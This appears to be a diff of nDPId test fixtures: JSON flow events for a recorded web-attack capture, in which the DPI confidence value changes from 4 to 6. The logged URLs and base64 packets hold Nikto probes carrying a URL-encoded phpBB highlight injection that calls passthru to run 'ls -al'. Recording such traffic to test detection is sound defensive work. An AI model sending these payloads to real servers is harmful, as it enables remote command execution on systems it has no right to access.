{"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":703,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":703,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277828,"flow_last_seen":1576420277828,"flow_idle_time":7580000,"flow_min_l4_payload_len":316,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":316,"midstream":1,"thread_ts_msec":1576420277828,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50968,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00904{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":703,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":703,"flow_packet_id":1,"flow_last_seen":1576420277828,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":382,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":382,"pkt_l4_len":348,"thread_ts_msec":1576420277828,"pkt":"AAAAAAAAAAAAAAAACABFAAFwciZAAEAGyV9\/AAABfwAAAccYH5BC50sWR3m1Q4AYAED\/ZAAAAQEICp1m\/2ydZv9sR0VUIC9wb3N0bnVrZS9pbmRleC5waHA\/TmlrdG89Zm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzk4KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
-01226{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":703,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":703,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277828,"flow_last_seen":1576420277828,"flow_idle_time":7580000,"flow_min_l4_payload_len":316,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":316,"midstream":1,"thread_ts_msec":1576420277828,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50968,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} +01226{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":703,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":703,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277828,"flow_last_seen":1576420277828,"flow_idle_time":7580000,"flow_min_l4_payload_len":316,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":316,"midstream":1,"thread_ts_msec":1576420277828,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50968,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": 
{"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":704,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":704,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277829,"flow_last_seen":1576420277829,"flow_idle_time":7580000,"flow_min_l4_payload_len":321,"flow_max_l4_payload_len":321,"flow_tot_l4_payload_len":321,"flow_avg_l4_payload_len":321,"midstream":1,"thread_ts_msec":1576420277829,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50970,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00908{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":704,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":704,"flow_packet_id":1,"flow_last_seen":1576420277829,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":387,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":387,"pkt_l4_len":353,"thread_ts_msec":1576420277829,"pkt":"AAAAAAAAAAAAAAAACABFAAF14pZAAEAGWOp\/AAABfwAAAccaH5CUOtum6t33\/4AYAED\/aQAAAQEICp1m\/22dZv9tR0VUIC9wb3N0bnVrZS9odG1sL2luZGV4LnBocD9OaWt0bz1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTgpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 
-01232{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":704,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":704,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277829,"flow_last_seen":1576420277829,"flow_idle_time":7580000,"flow_min_l4_payload_len":321,"flow_max_l4_payload_len":321,"flow_tot_l4_payload_len":321,"flow_avg_l4_payload_len":321,"midstream":1,"thread_ts_msec":1576420277829,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50970,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} +01232{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":704,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":704,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277829,"flow_last_seen":1576420277829,"flow_idle_time":7580000,"flow_min_l4_payload_len":321,"flow_max_l4_payload_len":321,"flow_tot_l4_payload_len":321,"flow_avg_l4_payload_len":321,"midstream":1,"thread_ts_msec":1576420277829,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50970,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":705,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":705,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277831,"flow_last_seen":1576420277831,"flow_idle_time":7580000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1576420277831,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50972,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00900{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":705,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":705,"flow_packet_id":1,"flow_last_seen":1576420277831,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":381,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":381,"pkt_l4_len":347,"thread_ts_msec":1576420277831,"pkt":"AAAAAAAAAAAAAAAACABFAAFvhNlAAEAGtq1\/AAABfwAAAcccH5Ac\/r3nTujavoAYAED\/YwAAAQEICp1m\/2+dZv9vR0VUIC9tb2R1bGVzL2luZGV4LnBocD9OaWt0bz1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5OCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01225{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":705,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":705,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277831,"flow_last_seen":1576420277831,"flow_idle_time":7580000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1576420277831,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50972,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} +01225{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":705,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":705,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277831,"flow_last_seen":1576420277831,"flow_idle_time":7580000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1576420277831,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50972,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} 
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":706,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":706,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277832,"flow_last_seen":1576420277832,"flow_idle_time":7580000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":313,"midstream":1,"thread_ts_msec":1576420277832,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50974,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00900{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":706,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":706,"flow_packet_id":1,"flow_last_seen":1576420277832,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":379,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":379,"pkt_l4_len":345,"thread_ts_msec":1576420277832,"pkt":"AAAAAAAAAAAAAAAACABFAAFtWm5AAEAG4Rp\/AAABfwAAAcceH5BY22NfXgseaYAYAED\/YQAAAQEICp1m\/3CdZv9wR0VUIC9waHBCQi9pbmRleC5waHA\/TmlrdG89Zm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTgpDQoNCg=="} 
-01223{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":706,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":706,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277832,"flow_last_seen":1576420277832,"flow_idle_time":7580000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":313,"midstream":1,"thread_ts_msec":1576420277832,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50974,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} +01223{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":706,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":706,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277832,"flow_last_seen":1576420277832,"flow_idle_time":7580000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":313,"midstream":1,"thread_ts_msec":1576420277832,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50974,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": 
{"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":707,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":707,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277834,"flow_last_seen":1576420277834,"flow_idle_time":7580000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":313,"midstream":1,"thread_ts_msec":1576420277834,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50976,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00900{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":707,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":707,"flow_packet_id":1,"flow_last_seen":1576420277834,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":379,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":379,"pkt_l4_len":345,"thread_ts_msec":1576420277834,"pkt":"AAAAAAAAAAAAAAAACABFAAFtY1BAAEAG2Dh\/AAABfwAAAccgH5CMmFp9naENboAYAED\/YQAAAQEICp1m\/3KdZv9yR0VUIC9mb3J1bS9pbmRleC5waHA\/TmlrdG89Zm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTgpDQoNCg=="} 
-01223{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":707,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":707,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277834,"flow_last_seen":1576420277834,"flow_idle_time":7580000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":313,"midstream":1,"thread_ts_msec":1576420277834,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50976,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} +01223{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":707,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":707,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277834,"flow_last_seen":1576420277834,"flow_idle_time":7580000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":313,"midstream":1,"thread_ts_msec":1576420277834,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50976,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": 
{"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":708,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":708,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277836,"flow_last_seen":1576420277836,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":1576420277836,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50978,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00860{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":708,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":708,"flow_packet_id":1,"flow_last_seen":1576420277836,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":349,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":349,"pkt_l4_len":315,"thread_ts_msec":1576420277836,"pkt":"AAAAAAAAAAAAAAAACABFAAFPP1dAAEAG\/E9\/AAABfwAAAcciH5AaoQZne4dTBYAYAED\/QwAAAQEICp1m\/3OdZv9zR0VUIC92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzk5KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
-01192{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":708,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":708,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277836,"flow_last_seen":1576420277836,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":1576420277836,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50978,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001399)"}} +01192{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":708,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":708,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277836,"flow_last_seen":1576420277836,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":1576420277836,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50978,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": 
{"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001399)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":709,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":709,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277838,"flow_last_seen":1576420277838,"flow_idle_time":7580000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":292,"midstream":1,"thread_ts_msec":1576420277838,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50980,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 